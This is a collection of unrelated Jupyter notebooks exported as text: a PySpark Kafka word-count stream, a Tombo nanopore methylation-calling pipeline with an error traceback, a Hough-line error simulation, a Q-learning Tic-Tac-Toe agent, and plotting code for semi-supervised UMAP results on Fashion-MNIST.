from pyspark import SparkContext, SparkConf
from pyspark.streaming import StreamingContext
from pyspark.streaming.kafka import KafkaUtils
from uuid import uuid1
import time
kafka_topic_name = "reco-train"
kafka_bootstrap_servers = 'localhost:9092'
###Output
_____no_output_____
###Markdown

###Code
from datetime import datetime
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
print("Current Time =", current_time)
sc = pyspark.SparkContext()
ssc = StreamingContext(sc,5)
kafka_topic_name = "reco-train"
kafka_bootstrap_servers = 'localhost:9092'
# Alternative stream constructors (overridden by the direct stream created below;
# note that the receiver-based createStream expects the ZooKeeper quorum, not the broker list):
# kvs = KafkaUtils.createStream(ssc, kafka_bootstrap_servers, 'spark-streaming-consumer', {kafka_topic_name:1})
# kvs = KafkaUtils.createDirectStream(ssc, [kafka_topic_name], {"metadata.broker.list": kafka_bootstrap_servers})
kvs = KafkaUtils.createDirectStream(ssc, [kafka_topic_name], {
'bootstrap.servers':kafka_bootstrap_servers,
'group.id':'test-group',
'auto.offset.reset':'largest'})
lines = kvs.map(lambda x: x[1])
# split each batch of lines into words and count occurrences per word
counts = lines.flatMap(lambda line: line.split(' ')).map(lambda word: (word, 1)).reduceByKey(lambda a, b: a+b)
counts.pprint()
ssc.start()
# stream will run for 50 sec
ssc.awaitTerminationOrTimeout(50)
ssc.stop()
sc.stop()
###Output
-------------------------------------------
Time: 2021-06-25 03:46:50
-------------------------------------------
-------------------------------------------
Time: 2021-06-25 03:46:55
-------------------------------------------
-------------------------------------------
Time: 2021-06-25 03:47:00
-------------------------------------------
-------------------------------------------
Time: 2021-06-25 03:47:05
-------------------------------------------
-------------------------------------------
Time: 2021-06-25 03:47:10
-------------------------------------------
-------------------------------------------
Time: 2021-06-25 03:47:15
-------------------------------------------
-------------------------------------------
Time: 2021-06-25 03:47:20
-------------------------------------------
-------------------------------------------
Time: 2021-06-25 03:47:25
-------------------------------------------
-------------------------------------------
Time: 2021-06-25 03:47:30
-------------------------------------------
-------------------------------------------
Time: 2021-06-25 03:47:35
-------------------------------------------
-------------------------------------------
Time: 2021-06-25 03:47:40
-------------------------------------------
|
germinated_spores-Tombo_basepair_modification_version_1/germinated_spores_1.ipynb | ###Markdown
Tombo is a suite of tools primarily for the identification of modified nucleotides from nanopore sequencing data; it re-annotates raw signal with the genomic alignment from existing basecalls. * This script will identify the modified bases in the sequences. Input: * fastq files * reference genome.fasta. Make sure that before you run any of your samples, you define your directories.
###Code
import os
FAST5IN_DIR = '../../analyses/single_fast5s/germinated_spores/rep1/'
GENOME_fn = '../../data/genomic_resources/chr_A_B_unassigned.fasta'
OUT_DIR = '../../analyses/methylation_calling/germinated_spores/'
Tombo_exc ='../../../anaconda3/bin/tombo'
##define your directories' pathway by giving them absoulte path.
FAST5IN_DIR = os.path.abspath(FAST5IN_DIR)
GENOME_fn = os.path.abspath(GENOME_fn)
OUT_DIR = os.path.abspath(OUT_DIR)
Tombo_exc = os.path.abspath(Tombo_exc)
!ls {FAST5IN_DIR}
!ls {GENOME_fn}
!{Tombo_exc} --version
###This step creates an index from raw nanopore reads and stores the raw signal alignments required to perform downstream analysis
!{Tombo_exc} resquiggle {FAST5IN_DIR} {GENOME_fn} --processes 15 --num-most-common-errors 5
###this command will detect for modification
!{Tombo_exc} detect_modifications alternative_model --fast5-basedirs {FAST5IN_DIR} \
--statistics-file-basename germinated_spores_rep1.stats \
--alternate-bases 5mC 6mA --processes 15
#plot raw signal at most significant 5mC locations
# NOTE: the statistics filename must match the basename given to detect_modifications above;
# Tombo appends the alternate base and ".tombo.stats" to that basename (assumed naming shown here)
!{Tombo_exc} plot most_significant --fast5-basedirs {FAST5IN_DIR} \
    --statistics-filename germinated_spores_rep1.stats.5mC.tombo.stats \
--plot-standard-model --plot-alternate-model 5mC \
--pdf-filename germinated_spores_rep_1_most_significant_5mC_sites.pdf
###Output
[09:55:45] Loading statistics from file.
******************** ERROR ********************
Statistics file not provided or provided file does not exist.
******************** ERROR ********************
Statistics file not provided or provided file does not exist.
Traceback (most recent call last):
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 2680, in __init__
self._parse_stats()
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 2564, in _parse_stats
'Statistics file not provided or provided file does not exist.')
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_helper.py", line 361, in error_message_and_exit
sys.exit()
SystemExit
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 3233, in TomboStats
stats = ModelStats(stat_fn)
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 2684, in __init__
'tombo/scripts/convert_stats.py if this stats file ' +
tombo.tombo_helper.TomboError: Invalid statistics file provided. Try running tombo/scripts/convert_stats.py if this stats file was created before Tombo v1.3.1
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 3141, in __init__
self._parse_stats()
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 2564, in _parse_stats
'Statistics file not provided or provided file does not exist.')
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_helper.py", line 361, in error_message_and_exit
sys.exit()
SystemExit
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/jamila/anaconda3/bin/tombo", line 11, in <module>
sys.exit(main())
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/__main__.py", line 279, in main
_plot_commands.plot_main(args)
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/_plot_commands.py", line 2343, in plot_main
plot_most_signif(*base_args, **kwargs)
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/_plot_commands.py", line 2007, in plot_most_signif
plot_intervals = ts.TomboStats(stats_fn).get_most_signif_regions(
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 3235, in TomboStats
stats = LevelStats(stat_fn)
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 3145, in __init__
'tombo/scripts/convert_stats.py if this stats file ' +
tombo.tombo_helper.TomboError: Invalid statistics file provided. Try running tombo/scripts/convert_stats.py if this stats file was created before Tombo v1.3.1
|
examples/notebooks/Statistical_error_analysis_of_line_extraction.ipynb | ###Markdown
Statistical error analysis of line uncertainty. We want to find the mean and variance of the parameters of the Hough transform for line extraction in 2 dimensions as a function of the length between two points. This will be a good starting point for comparing the relative accuracy of lines vs points.
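For reference, the line parametrization used in the simulation code below is the Hough normal form $\rho = x \cos\theta + y \sin\theta$, so each line is described by the pair $(\rho, \theta)$ and the quantities of interest are the errors $\Delta\rho$ and $\Delta\theta$ between the true and the estimated parameters.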
###Code
%matplotlib inline
# Simulations
import numpy as np
import scipy
import matplotlib.pyplot as plt
from scipy.stats import norm
N = 50000
img_size = 1000 #Average side length
bins = 100
L = 500 #pixels (average length)
sigma = 5./np.sqrt(12) #5 pixel uncertainty, assumed uniform
theta = np.random.uniform(-np.pi*0.85, np.pi*0.85, N)
x1 = np.random.uniform(0, img_size, (N, 2))
dx = np.array([np.sin(-theta)*L, np.cos(-theta) * L]).transpose()
x2 = x1 + dx
ro = x1[:, 0]*np.cos(theta) + x1[:, 1] * np.sin(theta)
dtheta = np.zeros(N)
dro = np.zeros(N)
for i in range(N):
x1_measured = np.random.multivariate_normal(x1[i], sigma*np.identity(2))
x2_measured = np.random.multivariate_normal(x2[i], sigma*np.identity(2))
dx_measured = x2_measured-x1_measured
theta_measured = np.arctan2(-dx_measured[0], dx_measured[1])
ro_measured = x1_measured[0]*np.cos(theta_measured) + x1_measured[1] * np.sin(theta_measured)
ro_measured_2 = x2_measured[0]*np.cos(theta_measured) + x2_measured[1] * np.sin(theta_measured)
dtheta[i] = theta[i]-theta_measured
dro[i] = ro[i] - ro_measured
ans = np.histogram(dtheta, bins, density = True)
y_theta = ans[0]
x_theta = ans[1][:-1]
sig_theta = np.std(dtheta)
print(sig_theta)
plt.plot(x_theta,y_theta, "-b", x_theta, norm.pdf(x_theta, 0, sig_theta), "-r")
plt.xlabel("$\\Delta \\theta$")
plt.ylabel("$p(\\Delta \\theta)$")
plt.legend(["Simulation", "Approximation"])
ans = np.histogram(dro/sigma, bins, range= (-5, 5), density = True)
y_ro = ans[0]
x_ro = ans[1][:-1]
sig_ro = np.std(dro/sigma)
print(sig_ro)
def double_exp_pdf(x, var):
b = np.sqrt(var/2)
return 1/(2*b)*np.exp(-np.abs(x)/b)
plt.plot(x_ro, y_ro, "-b", x_ro, double_exp_pdf(x_ro, sig_ro**2), "-r")
plt.xlabel("$\\frac{\\Delta r}{\\sigma}$")
plt.ylabel("$p(\\Delta r)$")
plt.legend(["Simulation", "Approximation"])
###Output
1.6622574229981983
###Markdown
Want to find https://stats.stackexchange.com/questions/3215/trigonometric-operations-on-standard-deviations$$ \hat{\theta} = \tan^{-1}(\Delta Y/\Delta X) $$ $$ \theta = \theta_0 + \Delta \theta$$$$ \Delta Y = \sigma_y \zeta + \mu_y$$$$ \Delta X = \sigma_x \xi + \mu_x$$where $\zeta, \xi$ are standard normal distributions. For simplicity we will assume that $\sigma_y = \sigma_x = \sigma$, $ \mu_y = \sin(\theta_0) L $, and $ \mu_x = \cos(\theta_0) L$ where $L$ is the distance$$ P[\hat{\theta} \le \theta] = P[\tan^{-1}(\Delta Y/\Delta X) \le \theta_0 + \Delta \theta] = P[\Delta Y/\Delta X \le \tan(\Delta \theta + \theta_0)] $$Let $q = \tan(\theta) = \tan(\Delta \theta + \theta_0) $$$ = P[\sigma \zeta + \mu_y \le q (\sigma_y \zeta + \mu_y)] $$$$ = P[\frac{\sigma}{L} (\zeta - q \xi) \le q \sin(\theta_0) - \cos(\theta_0)] $$This is a difference of gaussians giving a new gaussian being smaller than a function of $\theta$ and $\theta_0$. Let $b(\theta) = q \sin(\theta_0) - \cos(\theta_0) $ and $\sigma^*(\theta) = (\frac{\sigma}{L})^2(1 + \tan(\theta)^2)$ . The expression then becomes: $$ P[\hat{\theta} \le \theta] = \int_{-\infty}^{b(\theta)} \mathcal{N}\left(z; 0, \sigma^*(\theta) \right) dz $$ We have that $$ p(\theta) = \frac{d(P[\hat{\theta} \le \theta])}{d\theta} = \mathcal{N}\left(b(\theta); 0, \sigma^*(\theta) \right) \cdot \frac{db(\theta)}{d\theta} + \int_{-\infty}^{b(\theta)} \frac{d\left(\mathcal{N}\left(z; 0, \sigma^*(\theta) \right)\right)}{d\theta} dz$$ This simplifies to: $$ p(\theta) =\mathcal{N}\left(b(\theta); 0,\sigma^*(\theta) \right) \cdot \left(\frac{db(\theta)}{d\theta} + \frac{d((\sigma^*(\theta))^{-2})}{d\theta}\right) + \frac{1}{\sigma^*(\theta)}\frac{d\sigma^*(\theta) }{d\theta} \int_{-\infty}^{b(\theta)} \mathcal{N}\left(z; 0, \sigma^*(\theta) \right) dz$$
###Code
import sympy as sp
from sympy import symbols, exp, init_printing, latex, tan, atan, cos, sin
init_printing()
sig, theta, theta0, L = symbols("sigma theta theta_0 L")
mux = L * cos(theta0)
muy = L * sin(theta0)
Z = (muy * (sig + 1) - mux * (sig + 1) * tan(theta - theta0))**2 / (2 * (sig**2 + sig**2 + tan(theta - theta0)**2))
expr = Z.diff(theta).diff(theta).subs(theta, 0)
expr.subs(theta0, 0)
###Output
_____no_output_____ |
TicTacToe/TicTacToe_Agent.ipynb | ###Markdown
Tic-Tac-Toe Agent. In this notebook, you will learn to build an RL agent (using Q-learning) that learns to play Numerical Tic-Tac-Toe with odd numbers. The environment plays randomly against the agent, i.e. its strategy is to put an even number randomly in an empty cell. The following is the layout of the notebook: - Defining the epsilon-greedy strategy - Tracking state-action pairs for convergence - Defining hyperparameters for the Q-learning algorithm - Generating episodes and applying the Q-update equation - Checking convergence in Q-values Importing libraries. Write the code to import the Tic-Tac-Toe class from the environment file
###Code
# from <TC_Env> import <TicTacToe> - import your class from environment file
import collections
import numpy as np
import random
import pickle
import time
from matplotlib import pyplot as plt
from TCGame_Env import TicTacToe
from tqdm import tqdm
# Function to convert state array into a string to store it as keys in the dictionary
# states in Q-dictionary will be of form: x-4-5-3-8-x-x-x-x
# x | 4 | 5
# ----------
# 3 | 8 | x
# ----------
# x | x | x
def Q_state(state):
return ('-'.join(str(e) for e in state.flatten().astype(int))).replace('0','x')
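# Illustrative check on a hypothetical board (a 1 and a 4 placed, rest empty):
# Q_state(np.array([[1, 0, 0], [0, 4, 0], [0, 0, 0]])) returns '1-x-x-x-4-x-x-x-x'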
# Defining a function which will return valid (all possible actions) actions corresponding to a state
# Important to avoid errors during deployment.
def valid_actions(state):
valid_Actions = []
valid_Actions = [i for i in env.action_space(state)[0]] ###### -------please call your environment as env
return valid_Actions
# Defining a function which will add new Q-values to the Q-dictionary.
def add_to_dict(state):
state1 = Q_state(state)
valid_act = valid_actions(state)
if state1 not in Q_dict.keys():
for action in valid_act:
Q_dict[state1][action]=0
###Output
_____no_output_____
###Markdown
Epsilon-greedy strategy - Write your code here (you can build your epsilon-decay function similar to the one given at the end of the notebook)
###Code
# Defining epsilon-greedy policy.
def epsilon_greedy_strategy(state, time):
epsilon = min_epsilon + np.exp(-0.000001*time) * (max_epsilon - min_epsilon)
rand = np.random.random()
if rand > epsilon:
greedy_action = max(Q_dict[Q_state(state)],key=Q_dict[Q_state(state)].get)
else:
greedy_action = random.sample(valid_actions(state),1)[0]
return greedy_action
###Output
_____no_output_____
###Markdown
Tracking the state-action pairs for checking convergence - write your code here
###Code
# Initialise Q_dictionary as 'Q_dict' and States_tracked as 'States_track' (for convergence)
Q_dict = collections.defaultdict(dict)
States_track = collections.defaultdict(dict)
# Initialise few random states to be tracked
def initialise_tracking_states():
sample_action_values = [('1-x-x-x-x-4-x-x-x',(7,5)),
('x-2-x-x-x-x-5-x-x',(5,7)),
('x-8-x-7-x-x-x-x-x',(8,1)),
('x-x-x-1-6-x-x-x-x',(5,3)),
('7-4-x-x-x-6-3-x-x',(3,5)),
('x-9-5-x-x-x-8-4-x',(0,3)),
('2-7-x-x-6-x-x-3-x',(8,7)),
('x-8-x-x-x-x-x-9-x',(8,1)),
('x-6-x-x-x-x-x-x-1',(0,9)),
('1-2-x-x-x-6-7-x-x',(4,9)),
                            ('5-7-x-x-x-x-2-6-x',(2,3)),
('7-x-6-x-x-4-9-x-x',(8,5)),
('x-8-5-x-4-x-x-1-x',(6,9)),
('9-x-3-x-4-x-x-x-8',(1,1))]
for q_value in sample_action_values:
state = q_value[0]
action = q_value[1]
States_track[state][action] = []
def preview_game(current_status):
val = current_status.split('-')
print("\n "+str(val[0])+" | "+str(val[1])+" | "+str(val[2])+" ")
print('-----------')
print(" "+str(val[3])+" | "+str(val[4])+" | "+str(val[5])+" ")
print('-----------')
print(" "+str(val[6])+" | "+str(val[7])+" | "+str(val[8])+" \n")
preview_game('9-x-3-x-4-x-x-x-8')
#Defining a function to save the Q-dictionary as a pickle file
def save_obj(obj, name ):
with open(name + '.pkl', 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def save_tracking_states():
for state in States_track.keys():
for action in States_track[state].keys():
if state in Q_dict and action in Q_dict[state]:
States_track[state][action].append(Q_dict[state][action])
initialise_tracking_states()
States_track
###Output
_____no_output_____
###Markdown
Define hyperparameters ---write your code here
###Code
# total no. of episodes
EPISODES = 5000000
# learning rate
LR = 0.20
# discount factor
GAMMA = 0.8
# no. of episodes after which states_tracked will be saved
threshold = 2500
# no. of episodes after which to preview the status of games played
checkpoint_print_episodes = 500000
# Min_Greed: 0.1%
min_epsilon = 0.001
# Greed: 100%
max_epsilon = 1.0
###Output
_____no_output_____
###Markdown
Q-update loop ---write your code here
###Code
start_time = time.time()
q_track={}
q_track['1-x-x-x-x-4-x-x-x']=[]
q_track['x-2-x-x-x-x-5-x-x']=[]
q_track['x-8-x-7-x-x-x-x-x']=[]
q_track['x-x-x-1-6-x-x-x-x']=[]
q_track['7-4-x-x-x-6-3-x-x']=[]
q_track['x-9-5-x-x-x-8-4-x']=[]
q_track['2-7-x-x-6-x-x-3-x']=[]
q_track['x-8-x-x-x-x-x-9-x']=[]
q_track['x-6-x-x-x-x-x-x-1']=[]
q_track['1-2-x-x-x-6-7-x-x']=[]
q_track['5-7-x-x-x-x-2-6-x']=[]
q_track['7-x-6-x-x-4-9-x-x']=[]
q_track['x-8-5-x-4-x-x-1-x']=[]
q_track['9-x-3-x-4-x-x-x-8']=[]
agent_won_count = 0
env_won_count = 0
tie_count = 0
for episode in tqdm(range(EPISODES)):
##### Start writing your code from the next line
env = TicTacToe()
current_state = env.state
    ## Initializing parameters for the episode
reward=0
total_reward = 0
is_terminal = False
# adding the current state to dictionary
add_to_dict(current_state)
while not is_terminal:
current_lookup = Q_state(current_state)
        # applying the epsilon-greedy policy
current_action = epsilon_greedy_strategy(current_state, episode)
if Q_state(current_state) in q_track.keys():
q_track[Q_state(current_state)].append(current_action)
next_state,reward,is_terminal, msg = env.step(current_state,current_action)
next_lookup = Q_state(next_state)
if is_terminal:
q_value_max = 0
# Tracking the count of games won by agent and environment
if msg == "Agent Won!":
agent_won_count += 1
elif msg == "Environment Won!":
env_won_count += 1
else:
tie_count += 1
else:
add_to_dict(next_state)
max_next = max(Q_dict[next_lookup],key=Q_dict[next_lookup].get)
q_value_max = Q_dict[next_lookup][max_next]
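        # Standard Q-learning update: Q(s,a) <- Q(s,a) + LR * (reward + GAMMA * max_a' Q(s',a') - Q(s,a))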
Q_dict[current_lookup][current_action] += LR * ((reward + (GAMMA * (q_value_max))) - Q_dict[current_lookup][current_action])
current_state = next_state
total_reward += reward
if (episode + 1) % checkpoint_print_episodes == 0:
print("After playing %d games, Agent Won : %.4f, Environment Won : %.4f, Tie : %.4f"% (episode + 1,
agent_won_count / (episode + 1), env_won_count /(episode + 1), tie_count / (episode + 1)))
if ((episode + 1) % threshold) == 0:
save_tracking_states()
if ((episode + 1) % 1000000) == 0:
print('Processed %dM episodes'%((episode+1)/1000000))
elapsed_time = time.time() - start_time
save_obj(States_track,'States_tracked')
save_obj(Q_dict,'Policy')
print('Total Execution time: ', elapsed_time)
###Output
10%|█ | 500208/5000000 [06:31<57:39, 1300.63it/s]
###Markdown
Check the Q-dictionary
###Code
len(Q_dict)
# try checking for one of the states - to see which action your agent thinks is the best ----- This will not be evaluated
Q_dict['x-2-x-x-x-x-5-x-x']
###Output
_____no_output_____
###Markdown
Check the states tracked for Q-values convergence (non-evaluative)
###Code
# Write the code for plotting the graphs for state-action pairs tracked
plt.figure(0, figsize=(16,7))
plt.subplot(241)
t1=States_track['x-2-x-x-x-x-5-x-x'][(5,7)]
plt.title("(s,a)='x-2-x-x-x-x-5-x-x',(5,7)")
plt.plot(np.asarray(range(0, len(t1))),np.asarray(t1))
plt.subplot(242)
t2=States_track['1-x-x-x-x-4-x-x-x'][(7,5)]
plt.title("(s,a)='1-x-x-x-x-4-x-x-x',(7,5)")
plt.plot(np.asarray(range(0, len(t2))),np.asarray(t2))
plt.subplot(243)
t3=States_track['9-x-3-x-4-x-x-x-8'][(1,1)]
plt.title("(s,a)='9-x-3-x-4-x-x-x-8',(1,1)")
plt.plot(np.asarray(range(0, len(t3))),np.asarray(t3))
plt.subplot(244)
t4=States_track['x-8-5-x-4-x-x-1-x'][(6,9)]
plt.title("(s,a)='x-8-5-x-4-x-x-1-x',(6,9)")
plt.plot(np.asarray(range(0, len(t4))),np.asarray(t4))
plt.show()
###Output
_____no_output_____
###Markdown
Epsilon - decay check
###Code
max_epsilon = 1.0
min_epsilon = 0.001
time = np.arange(0,5000000)
epsilon = []
for i in range(0,5000000):
epsilon.append(min_epsilon + (max_epsilon - min_epsilon) * np.exp(-0.000001*i))
plt.plot(time, epsilon)
plt.show()
###Output
_____no_output_____ |
docs/_sources/python/pandas.ipynb | ###Markdown
Pandas count unique words in a column
###Code
results = set()
df['text'].str.lower().str.split().apply(results.update)
n_words = len(results)
n_words
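# An equivalent one-liner, assuming the same 'text' column (explode flattens the word lists):
# df['text'].str.lower().str.split().explode().nunique()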
###Output
_____no_output_____
###Markdown
Random sample for each class
###Code
def random_balance_subset(df, n=2000):
"""select random n sample for each class
Args:
df (df): with y label as e.g. [0, 1]
n (int): num
"""
list_of_dataframes = []
ys = list(df['y'].unique())
for y in ys:
subsample = df[df['y'] == y].sample(n=n, random_state=CONFIG['seed'])
list_of_dataframes.append(subsample)
res = pd.concat(list_of_dataframes)
return res
df_mini = random_balance_subset(df)
df_mini['y'].value_counts()
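# A groupby-based sketch of the same idea (assumes the same 'y' column and CONFIG['seed']):
# df.groupby('y', group_keys=False).apply(lambda g: g.sample(n=2000, random_state=CONFIG['seed']))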
###Output
_____no_output_____
###Markdown
convert dataframe to csv
###Code
df.to_csv('train_mini.csv')
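# Pass index=False if the integer index should not be written as an extra column:
# df.to_csv('train_mini.csv', index=False)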
###Output
_____no_output_____
###Markdown
index reset
###Code
df.reset_index(drop=True, inplace=True)
###Output
_____no_output_____ |
notebooks/E_datarequest.ipynb | ###Markdown
WARNING Data request lines are commented out to prevent accidental resubmission when running through the entire notebook quickly.
###Code
print(data_request_url)
#Data Request Line
r = requests.get(data_request_url, params=params, auth=(username, token))
data = r.json()
%%time
check_complete = data['allURLs'][1] + '/status.txt'
for i in range(1800):
r = requests.get(check_complete)
if r.status_code == requests.codes.ok:
print('request completed')
break
else:
time.sleep(1)
print(data['allURLs'][0])
###Output
_____no_output_____ |
notebooks/semisupervised/FMNIST/fmnist-plot-results.ipynb | ###Markdown
View UMAP results for baseline
###Code
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from tfumap.paths import FIGURE_DIR, save_fig
from tfumap.paths import MODEL_DIR
from tfumap.semisupervised_keras import pretrained_networks
dataset = "fmnist"
datasets = [dataset]
aug_types = [
"not_augmented",
"umap_euclidean",
"umap_learned",
"augmented",
"umap_augmented_learned",
"umap_euclidean_augmented",
"umap_over_z"
]
dset_sizes = [4, 16, 64, 256, 1024, "full"]
results_loc = MODEL_DIR / 'semisupervised-keras'
results_df = pd.DataFrame(columns=['dataset', 'labels_per_class', 'augmented', 'timestamp', 'location', 'test_acc', 'dset_size_title'])
for dataset in datasets:
for aug_type in aug_types:
for dset_size in dset_sizes:
dset_timestamp = pretrained_networks[dataset][aug_type][dset_size]
dset_loc = results_loc / dataset/ str(dset_size) / dset_timestamp
loc_list = list(dset_loc.glob('test_loss.npy'))
if dset_size == 'full':
if aug_type == 'augmented':
print(loc_list)
print(aug_type)
if len(loc_list) == 0:
print(aug_type, dset_size, dataset, dset_loc)
continue
test_loss, test_acc = np.load(loc_list[0])
dset_size_title = str(dset_size)
            dset_size = str(dset_size) if dset_size != 'full' else 4096
results_df.loc[len(results_df)] = [
dataset, dset_size, aug_type, dset_timestamp, dset_loc, test_acc, dset_size_title
]
results_df
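# Optional cross-check before plotting (uses only the columns built above): mean test
# accuracy per augmentation strategy and dataset size.
results_df.astype({'test_acc': float}).pivot_table(index='augmented', columns='dset_size_title', values='test_acc')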
pal = sns.color_palette('tab20c',20)
sns.palplot(pal)
color_list = [
{
"mask": results_df.augmented == 'not_augmented',
"color": pal[16],
"ls": 'solid',
"marker": 'o',
"label": "Baseline"
},
{
"mask": results_df.augmented == 'umap_euclidean',
"color": pal[0],
"ls": 'solid',
"marker": 'o',
"label": "+ UMAP (euclidean)"
},
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
1,
2,
figsize=(5, 5),
dpi=100,
sharey=True,
gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
mask = col_dict["mask"]
color = col_dict['color']
ls = col_dict['ls']
label = col_dict['label']
marker = col_dict['marker']
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
ax.scatter(nex, 1-acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(nex, 1-acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
#display(subset_ds)
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
ax2.scatter(nex, 1-acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(
[],
[],
"-" + marker,
color=color,
linewidth=linewidth,
label=label,
alpha=alpha,
markersize=7,
#markerfacecolor="none",
ls=ls,
)
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015 # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes) # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
ax.set_ylim([5e-2, 1])
ax2.set_yscale('log')
ax.set_title(dataset.upper())
ax.set_ylabel('Classification Error')
ax.set_xlabel('# Training Examples')
color_list = [
{
"mask": results_df.augmented == 'not_augmented',
"color": pal[16],
"ls": 'solid',
"marker": 'o',
"label": "Baseline"
},
{
"mask": results_df.augmented == 'umap_euclidean',
"color": pal[0],
"ls": 'solid',
"marker": 'o',
"label": "+ UMAP (Euclidean)"
},
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
1,
2,
figsize=(5, 3),
dpi=100,
sharey=True,
gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
mask = col_dict["mask"]
color = col_dict['color']
ls = col_dict['ls']
label = col_dict['label']
marker = col_dict['marker']
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
#display(subset_ds)
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
ax2.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(
[],
[],
"-" + marker,
color=color,
linewidth=linewidth,
label=label,
alpha=alpha,
markersize=7,
#markerfacecolor="none",
ls=ls,
)
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015 # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes) # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
ax.set_ylim([5e-2, 1])
ax2.set_yscale('log')
ax.set_title(dataset.upper(), x=0.605)
ax.set_ylabel('Accuracy')
ax.set_xlabel('# Training Examples', x=0.605)
#save_fig(FIGURE_DIR/(dataset + '_umap_euclidean'), save_pdf = True)
color_list = [
{
"mask": results_df.augmented == 'not_augmented',
"color": pal[16],
"ls": 'solid',
"marker": 'o',
"label": "Baseline"
},
{
"mask": results_df.augmented == 'umap_learned',
"color": pal[4],
"ls": 'solid',
"marker": 'o',
"label": "+ UMAP (learned)"
},
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
1,
2,
figsize=(5, 3),
dpi=100,
sharey=True,
gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
mask = col_dict["mask"]
color = col_dict['color']
ls = col_dict['ls']
label = col_dict['label']
marker = col_dict['marker']
